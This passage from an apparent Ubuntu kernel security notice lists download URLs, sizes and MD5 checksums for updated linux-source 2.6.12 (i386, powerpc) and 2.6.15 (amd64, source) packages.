    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/md-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   194788 57e029eb40bb7a743483c0df280cbc26
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nfs-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   166500 9d81e66b6eb7ec5030e1efad41772cf3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-firmware-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:  1048168 1dcef3bb6fbe4b4e48519ee88c7a5a03
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:  1341392 ada1fa6ff9bf9a9cc1d3715632a4d44b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-pcmcia-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   123676 a0cc7e3400eed26decc5df74e3db194f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-shared-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:     8250 35a1ba92feae731ef8afe242fcf56d69
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-usb-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    93372 0323bc0bc906852ba6c678c316e34e0a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ntfs-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    46814 db4208f3413f9968dc4f942b48b044fc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/parport-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    29768 6e7c97185950b008ede87100a717eb9a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    72280 0eeed896d2349953d2f1937f49d210d1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-storage-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:     4258 b48aa8a9252206ec13eaf74b910c4175
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/plip-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:     7666 323faf7fa2356431b81bd4633445e8d6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ppp-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    50626 251d2e3de723c113692b5e7bd0e1f933
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/reiserfs-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   108634 54f9a84003ef543c95574b0ef460e284
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/rtc-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:     9808 54bf9633868b60e146ff09e2ece72b4b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/sata-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    67636 d44df0b1daa89215fa85c40f07cb97cc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-core-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    70184 b0f884bd9c492e663ae12b8545a36ebf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:  1481088 9ed81df02f3a04cb8ee2f7395743b209
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/serial-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    55202 0143f5689676182f087f801f513800be
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/socket-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    20362 1483cb6cbc61442dce50de06f3e6894f
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.12/ufs-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    29912 b9c4b0c153497abbe0028cb3994dd0cf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   111226 05385697b9f48fb3d742322e6a8378d8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-storage-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:    34560 e6e90bebc9acf221c8e079b0862d228f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/xfs-modules-2.6.12-10-386-di_2.6.12-10.42_i386.udeb
      Size/MD5:   263266 f639bfe47a019430017f5f95e1d50b85

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/affs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    23364 76c3c97c742c343b10a27a758d648408
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/affs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    26344 d4220aca0911a33b685d26391396b020
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/cdrom-core-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    55914 94d68c3c18faaac1d0819d5f06cbf5af
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/cdrom-core-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    58832 af2860be50f5c32ae28a4f5bf5a8937b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/crc-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     2316 f648e7945d7768d69ac0bde9d4a02c46
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/crc-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     2500 2df357eca3be75a13901ff57fb07e39f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext2-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    29752 3787fee334598533027558d35a7018e2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext2-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    34718 1fb9c93c4d3f335297662b09b8d51ef9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext3-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   104760 c7a01d4722d1a3cf5f0f9bddb94f6b91
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ext3-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   122256 5e053768b21eaf23041593545636da6f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fat-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    40502 ecbc94bbdb0e5573de240b5b8c28d9a7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fat-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    45902 891cd2a3d99d86a28fdb8fb16c95d721
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fb-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    28998 58ddde0654dff26c036115ff2e8e7911
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fb-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    29928 58172cbb2a970f9cf3114295249e4e11
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firewire-core-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   210094 dbe0186e17be3e9a9b942e7df84797fb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firewire-core-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   224764 7d76ea5f2772fe0b9011cca9cc008236
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firmware-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     6148 80319e7ec978ffa2c23a3a5924cdd2d9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/firmware-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     6962 6f76b3815a5ed33c2d01206468e8d025
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/floppy-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    45170 f0ce31f56e36814bf2621a8539f7e206
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/floppy-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    40416 beeb8dac63e20f27fd29604945e95022
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fs-common-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     9796 38ed197302ae72dedac6ffe0076e2b36
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/fs-common-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    11784 e350d629a0e2df5607ad30623677eb11
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/hfs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    76786 32b9997b4389612e70d8abb615933a67
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/hfs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    85190 60a9cde45e8c6c6a2f71672dabc0ab30
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   112162 5e408f7fb037f13a4080a5d883e7da3a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ide-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   129212 841714ec80c4f95fdbb166145e5c2111
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/input-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    76738 b10d37852e1cb4b676a14c5330e8c4de
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/input-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    90404 6859c35ecdddb5a02eb875f0ee4944aa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ipv6-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   140764 a63b2913bc19c70f4fa6c971c710a2e1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ipv6-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   157280 e7b26734e954ec468f2ecffdb919fbe9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/irda-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   306084 0e43dc46766d5d4b1c83c91a64bd18e4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/irda-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   210710 7210d3294ecc74f50f3e99a584107cf2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/jfs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   110776 a862c670285c035f7db03580ee6bf252
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/jfs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   116646 b27dc678b3f6a6a32e2c463769d8bc83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/kernel-image-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1976696 0f5ebd2a50742cbeb698e4b50220ea6f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/kernel-image-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  2350414 6b9defce9adb73c0c62ecc5f34d03fdc
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.12/linux-headers-2.6.12-10-iseries-smp_2.6.12-10.42_powerpc.deb
      Size/MD5:   774796 55a279c378f508cf031bddbc3990499f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-powerpc-smp_2.6.12-10.42_powerpc.deb
      Size/MD5:   783382 f504ef42567eacf57f7388be07550a4a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-powerpc64-smp_2.6.12-10.42_powerpc.deb
      Size/MD5:   801448 88e982ec1a3469fa2cd323682c4a7f30
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10-powerpc_2.6.12-10.42_powerpc.deb
      Size/MD5:   784026 8b01e7d36109a54ede6262bf6cec1f0d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-headers-2.6.12-10_2.6.12-10.42_powerpc.deb
      Size/MD5:  5938238 51b02a2066d423cd2321039050bc357b
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.12/linux-image-2.6.12-10-iseries-smp_2.6.12-10.42_powerpc.deb
      Size/MD5: 19522244 d8ed62188372a0d097de9bae961359f2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-powerpc-smp_2.6.12-10.42_powerpc.deb
      Size/MD5: 18359288 9171f6637d4a52c2e46ea2cc388c5659
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-powerpc64-smp_2.6.12-10.42_powerpc.deb
      Size/MD5: 21187336 1c994790a67a8bf8c169c99a62982691
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-image-2.6.12-10-powerpc_2.6.12-10.42_powerpc.deb
      Size/MD5: 18009416 fed4bfa6f231016f066f051d49e18933
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/linux-patch-ubuntu-2.6.12_2.6.12-10.42_powerpc.deb
      Size/MD5:  3518596 07c19c15ebf870ba1b4da43b26461e19
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/loop-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    17620 b9ba54c639f99708da112eca942cfc68
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/loop-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    17788 1a0350f5954b45475e7d0712e3a87e8e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/md-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   234110 e20d6bc1b328def1f09c98d423ee3077
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/md-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   258846 60410b6a21014f9ca1cc3e3c208094b1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nfs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   208856 24e12cf0ff53032c7e17ac1d4ace102b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nfs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   235398 59adee1cecaf86e47e714ea9308489f9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-firmware-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1048296 b2fc57909c8dbdb6d271acbe75557bc2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-firmware-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1048426 e614d2f04fe09252ebcd35839b8f945a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1458024 1bd1f7538c2bbf3dad1f908b649ff585
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1622966 cad7d64e06df2f5dc41decdb09695834
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-pcmcia-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   212826 30308ebec5613b5c4972b27b58a21c1c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-pcmcia-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   197962 d05b7cc803808d4e29af704a283e9537
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-shared-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     9462 feb939110d24e8e4d7091c6753a7d9e2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-shared-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     9058 06d11bb32a022d64aa92ad637fb5b43a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-usb-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   115322 8d1915a0b5314485bee9d84c17788f3f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/nic-usb-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   134442 1b5bf2fac0bfb53bc1dd7181c4fd1c30
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    77022 a9ae87cfd71fd6ed8e7b61f82fcf1b22
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    87530 9528e1429f7d88ba30c9a215be6a8be3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-storage-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     4816 887d270edb4f70607e73ff1117d5f5e8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/pcmcia-storage-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:     5280 9e843aeca31a04cbe9e3e09aaead4f38
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ppp-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    63048 9cd8895c5bbe6b5e6de784b1d41287da
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/ppp-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    75992 11644b9db6a4eba455dac2de343663bc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/reiserfs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   128628 35f938c822f7a33e25481d05218f35e1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/reiserfs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   164352 8c5cb266390809dce0ae8103d78fd68b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/sata-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    77430 85a1dbae6d9f3cda560c4878c9af9f6d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/sata-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    98156 3dda8b3fa90f6462fc4627ae076a3865
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-core-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    85246 9209441293f7e084d93de2cd1951c6df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-core-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    92312 2c8579d9e520c3c12e52c921fc166524
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1537908 165e00afd9d9b1a4376a932ab63f672c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/scsi-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:  1755640 844f17dd690801658670bb0f7f648e91
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/serial-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    65296 a915a1a194cca1d48a90acc65294015d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/serial-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   100432 281c6be595cd2842135a6aabe973ccef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/socket-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    22880 8bc2dcc7dfebe2144d66932947f75ed2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/socket-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    28598 89ba780bebb63ed0621233cce28be199
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.12/ufs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    35496 3071a31da4ab4a851be785abad9c7dc6
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.12/ufs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    39802 de1995b80f0c6cd5f181755b2b10af74
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   139894 5d6d8e72213a0d9156b05551d624a46c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   152634 69e447701a3797e0ee7efadd5f18eb2b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-storage-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    40962 c933c561451b9257002ba5f2f5df7953
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/usb-storage-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:    44416 a05e3c9cfedf4e96691b54db60cb7790
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/xfs-modules-2.6.12-10-powerpc-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   296168 e19aeb64469013823775df6dd1d85f03
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.12/xfs-modules-2.6.12-10-powerpc64-smp-di_2.6.12-10.42_powerpc.udeb
      Size/MD5:   324188 cadd21ca1e903b1b3387d73cb33b9adb

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-27.50.diff.gz
      Size/MD5:  2820879 09660e70a803e2855bf530b6442c4cb6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-27.50.dsc
      Size/MD5:     2379 7e273768e8019267d38c6df771731a7e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
      Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-27.50_all.deb
      Size/MD5:  5162076 27eecbf0895dacb7c745a0d026452119
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-27.50_all.deb
      Size/MD5:    89952 3ef8c5bf5f29bc963a5cbd74150bdd92
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-27.50_all.deb
      Size/MD5: 44720704 f6fa38a806ac461615ca01fa875c5519

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    22350 24c545bf8d51935b41699746541f85a3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    44772 e9eb0d67c0a25f89e14eb6a0cff430b4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:     2306 7068ed387b243889018d41654eb85aef
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    36196 9c684d21601c04666d92224b5ceff7fc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   102188 96f282b553716c805cf80f3e3b24c69e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    38606 306ffa271d3e5fdf37f501aa22bf4ead
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    49136 f02a101e95e5672610014a7d3f2d1e27
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   176702 0e55b12c8975532f42516467f84270b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    36770 848aa573a204ee47c7304446bf20fbb6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   142250 14b3bfc3d0786cdbb8d8d407ba7eae5f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    51042 500d4d33e88e56860c1c411e966150ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   140430 062254845eb065c5a79b88073f5d3c4d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:   286904 6e2f211b94cf82bd412d31a0c3733bed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:    97800 91d76b51826f200ff292811df02cbe7c
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-27-amd64-generic-di_2.6.15-27.50_amd64.udeb
      Size/MD5:  1650466 78683905b1b7224ecf973e77ff1fe02a
